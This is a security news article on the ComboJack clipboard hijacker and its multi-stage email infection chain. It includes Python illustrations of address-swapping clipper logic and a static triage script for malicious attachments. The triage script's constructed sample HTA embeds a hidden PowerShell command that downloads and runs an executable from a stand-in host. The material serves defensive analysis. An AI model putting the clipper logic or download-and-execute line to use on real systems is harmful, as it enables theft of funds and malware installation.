Security researchers who track ransomware and other malware have identified a new strain that detects when a user copies a cryptocurrency wallet address to the Windows clipboard. It does not merely observe the copy: it silently replaces the copied address with one controlled by the malware's author, so a payment the victim pastes and sends goes to the attacker instead.
The malware, currently named ComboJack, closely resembles earlier clipboard hijackers such as CryptoShuffler and Evrial. What sets ComboJack apart is breadth: rather than watching for Bitcoin addresses alone, it recognises addresses for several cryptocurrencies and online payment systems.
According to Palo Alto Networks, ComboJack recognises not only addresses for major cryptocurrencies such as Bitcoin, Ethereum, Litecoin and Monero, but also account identifiers for payment systems such as Yandex Money, Qiwi and WebMoney.
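To make the clipboard-swapping behaviour concrete, the following is an added illustration written for this page, not ComboJack's own code: it shows how a clipper classifies clipboard text by wallet-address format, the swap it performs, and a cheap defensive check that compares what was copied with what is about to be pasted. The address patterns are simplified to prefix, character set and length and validate no checksums; the WebMoney and Yandex Money patterns are assumptions about those systems' account-number formats, and the attacker wallet values are synthetic.

```python
"""Clipboard-hijacker ("clipper") logic as an added illustration, not ComboJack's
own code: how such malware recognises wallet addresses by format, the swap it
performs on the clipboard, and a cheap defensive check (compare what you copied
with what you are about to paste). Patterns are simplified to prefix, charset
and length and validate no checksums; the payment-system patterns are assumptions
about the account-number format."""
import re
from typing import Optional

ADDRESS_PATTERNS = {
    # legacy/P2SH base58 form, or bech32 (bc1...) form
    "bitcoin": re.compile(r"^(?:[13][a-km-zA-HJ-NP-Z1-9]{25,34}|bc1[02-9ac-hj-np-z]{39,59})$"),
    "ethereum": re.compile(r"^0x[0-9a-fA-F]{40}$"),
    "litecoin": re.compile(r"^[LM][a-km-zA-HJ-NP-Z1-9]{26,33}$"),
    "monero": re.compile(r"^4[0-9AB][1-9A-HJ-NP-Za-km-z]{93}$"),
    "webmoney": re.compile(r"^[ZREUBDG]\d{12}$"),     # assumed: currency letter + 12 digits
    "yandex_money": re.compile(r"^41001\d{9,10}$"),   # assumed: 14-15 digit wallet number
}


def classify(text: str) -> Optional[str]:
    """Name of the first address format `text` matches, or None for ordinary text."""
    text = text.strip()
    for name, pattern in ADDRESS_PATTERNS.items():
        if pattern.match(text):
            return name
    return None


# Constructed attacker wallets, one per format (synthetic, not real addresses).
ATTACKER_WALLETS = {
    "bitcoin": "1AttackerAttackerAttackerAttackerx",
    "ethereum": "0x" + "ab" * 20,
    "litecoin": "L" + "c" * 33,
    "monero": "4A" + "1" * 93,
    "webmoney": "Z999999999999",
    "yandex_money": "41001999999999",
}


def hijack(clipboard_text: str, wallets=ATTACKER_WALLETS) -> str:
    """What the clipper does on every poll: swap a recognised address for the
    attacker's address of the same kind; leave everything else untouched."""
    kind = classify(clipboard_text)
    if kind is None or kind not in wallets:
        return clipboard_text
    return wallets[kind]


class Clipboard:
    """Minimal clipboard model: the user copies, the clipper polls and rewrites,
    the user pastes."""

    def __init__(self) -> None:
        self.content = ""

    def copy(self, text: str) -> None:
        self.content = text

    def paste(self) -> str:
        return self.content


def paste_guard(copied: str, pasted: str):
    """Return (ok, reason). A paste whose address differs from the one copied is
    exactly the symptom a clipper produces, so flag it before sending funds."""
    kind = classify(copied)
    if kind is None:
        return True, "not an address"
    if pasted == copied:
        return True, "address unchanged"
    return False, f"{kind} address was replaced with {pasted}"


def simulate(user_copies: str, clipper_active: bool):
    """Copy -> (optional clipper poll) -> paste, returning (pasted_text, guard_ok)."""
    clipboard = Clipboard()
    clipboard.copy(user_copies)
    if clipper_active:
        clipboard.copy(hijack(clipboard.paste()))  # one iteration of the clipper's polling loop
    pasted = clipboard.paste()
    ok, _reason = paste_guard(user_copies, pasted)
    return pasted, ok


if __name__ == "__main__":
    genesis = "1A1zP1eP5QGefi2DMPTfTL5SLmv7DivfNa"  # well-known Bitcoin genesis-block address
    for text in (genesis, "0x" + "deadbeef" * 5, "see you at 3pm"):
        pasted, ok = simulate(text, clipper_active=True)
        print(f"{text[:20]:<20} -> {pasted[:20]:<20} guard_ok={ok}")
```

The defensive check is deliberately dumb: a wallet or exchange front end that remembers the address the user last copied and refuses to submit a transaction when the pasted address differs of the same type catches every clipper of this design, regardless of which currencies it supports.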
Palo Alto Networks reports that ComboJack is being actively distributed; the company says it recently observed the malware in a campaign targeting users in the United States and Japan.
Multi-Step Infection Chain
The infection chain for ComboJack is long and involved, but it follows the same pattern seen last year in the Locky (ransomware) and Dridex (banking Trojan) campaigns.
The operators send victims an email claiming to contain a scan of a lost passport, with a PDF attached. A user who downloads and opens the PDF is presented with an embedded RTF file; that RTF in turn contains an embedded HTA object that exploits a DirectX vulnerability. On successful exploitation, the HTA runs a series of PowerShell commands that download and execute a self-extracting archive (SFX). That first SFX downloads and runs a second, password-protected SFX, which installs ComboJack.
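The chain above (PDF carrying an RTF, RTF carrying an HTA object, HTA launching PowerShell) is exactly the kind of nesting an analyst wants to unwrap statically before anything is executed. The following triage script is an added example written for this page; it is not Palo Alto Networks' tooling and the sample bytes are constructed, not taken from the real lure. It assumes flat PDF dictionaries, an uncompressed or Flate-compressed embedded-file stream, and an RTF whose `\objdata` holds the HTA bytes directly (real OLE objects wrap the file in an OLE1 container that must be unwrapped first). `example.invalid` is a reserved name that never resolves.

```python
"""Static triage of the attachment chain described above (PDF -> embedded RTF ->
embedded HTA -> PowerShell). Added illustration, not Palo Alto Networks' tooling
and not the real lure; the sample bytes below are constructed. Simplifications:
flat PDF dictionaries only, and the constructed RTF stores the HTA bytes directly
in \\objdata (real OLE objects wrap the file in an OLE1 container)."""
import binascii
import re
import zlib

# <<flat dict>> stream ... endstream  (no nested dictionaries)
STREAM_RE = re.compile(rb"<<([^<>]*)>>\s*stream\r?\n(.*?)\nendstream", re.S)
FILESPEC_RE = re.compile(rb"/Type\s*/Filespec.*?/F\s*\(([^)]*)\)", re.S)
# {\*\objclass <name>} ... {\*\objdata <hex>}
OBJECT_RE = re.compile(rb"\\objclass\s+([^\\{}\s]+).*?\\objdata\s*([0-9A-Fa-f\s]+)", re.S)
HTA_MARKERS = (b"<hta:application", b"wscript.shell", b"activexobject", b"<script")
PS_RE = re.compile(rb"powershell(?:\.exe)?[^\r\n]*", re.I)
URL_RE = re.compile(rb"https?://[^\s\"'<>]+", re.I)


def pdf_attachment_names(pdf: bytes) -> list:
    """Names declared by /Filespec entries (the lure's 'passport scan' RTF)."""
    return [n.decode(errors="replace") for n in FILESPEC_RE.findall(pdf)]


def pdf_embedded_streams(pdf: bytes) -> list:
    """Raw bytes of every /EmbeddedFile stream, inflating /FlateDecode ones."""
    out = []
    for dict_body, data in STREAM_RE.findall(pdf):
        if b"/EmbeddedFile" not in dict_body:
            continue
        if b"/FlateDecode" in dict_body:
            data = zlib.decompress(data)
        out.append(data)
    return out


def rtf_objects(rtf: bytes) -> list:
    """Embedded objects in an RTF: class name plus the hex-decoded \\objdata blob."""
    objs = []
    for cls, hexdata in OBJECT_RE.findall(rtf):
        payload = binascii.unhexlify(re.sub(rb"\s", b"", hexdata))
        objs.append({"class": cls.decode(errors="replace"), "payload": payload})
    return objs


def triage_payload(payload: bytes) -> dict:
    """Is this an HTA, and what does it launch? Pulls the PowerShell line and URLs."""
    low = payload.lower()
    ps = PS_RE.search(payload)
    return {
        "is_hta": any(marker in low for marker in HTA_MARKERS),
        "powershell": ps.group(0).decode(errors="replace") if ps else None,
        "urls": [u.decode(errors="replace") for u in URL_RE.findall(payload)],
    }


def triage_chain(pdf: bytes) -> dict:
    """Walk PDF -> RTF -> object -> HTA and return a verdict with indicators."""
    report = {"attachments": pdf_attachment_names(pdf), "stages": [], "urls": []}
    for stream in pdf_embedded_streams(pdf):
        if not stream.lstrip().startswith(b"{\\rtf"):
            continue
        for obj in rtf_objects(stream):
            stage = triage_payload(obj["payload"])
            stage["objclass"] = obj["class"]
            report["stages"].append(stage)
            report["urls"].extend(stage["urls"])
    report["verdict"] = ("suspicious" if any(s["is_hta"] and s["powershell"]
                                             for s in report["stages"]) else "clean")
    return report


# Constructed lure chain (synthetic; example.invalid is a reserved, non-resolving name).
SAMPLE_HTA = (
    b'<html><head><hta:application id="app" showintaskbar="no" windowstate="minimize"/>\n'
    b'<script language="VBScript">\n'
    b'Set sh = CreateObject("WScript.Shell")\n'
    b'sh.Run "powershell -w hidden -c ""iwr http://example.invalid/stage1.exe '
    b'-OutFile $env:TEMP\\s1.exe; Start-Process $env:TEMP\\s1.exe""", 0\n'
    b'</script></head></html>')
SAMPLE_RTF = (b"{\\rtf1\\ansi Scan of the lost passport is embedded below.\n"
              b"{\\object\\objemb{\\*\\objclass htafile}\\objw1\\objh1"
              b"{\\*\\objdata " + binascii.hexlify(SAMPLE_HTA) + b"}}}")


def build_sample_pdf(rtf: bytes = SAMPLE_RTF) -> bytes:
    """Minimal PDF skeleton (no xref) with the RTF as a Flate-compressed attachment."""
    data = zlib.compress(rtf)
    return (b"%PDF-1.7\n1 0 obj << /Type /Catalog >> endobj\n"
            b"2 0 obj << /Type /Filespec /F (Passport_scan.rtf) /EF << /F 3 0 R >> >> endobj\n"
            b"3 0 obj << /Type /EmbeddedFile /Filter /FlateDecode /Length "
            + str(len(data)).encode() + b" >>\nstream\n" + data + b"\nendstream\nendobj\n%%EOF\n")


if __name__ == "__main__":
    import json
    print(json.dumps(triage_chain(build_sample_pdf()), indent=2))
```

Run against the constructed sample, the report names the attached RTF, identifies the embedded object as an HTA, recovers the PowerShell command line and the download URL, and returns a "suspicious" verdict; the URL list is what you would push into blocklists and hunt for in proxy logs, while the objclass and PowerShell line are what you would turn into an email-gateway or endpoint detection rule.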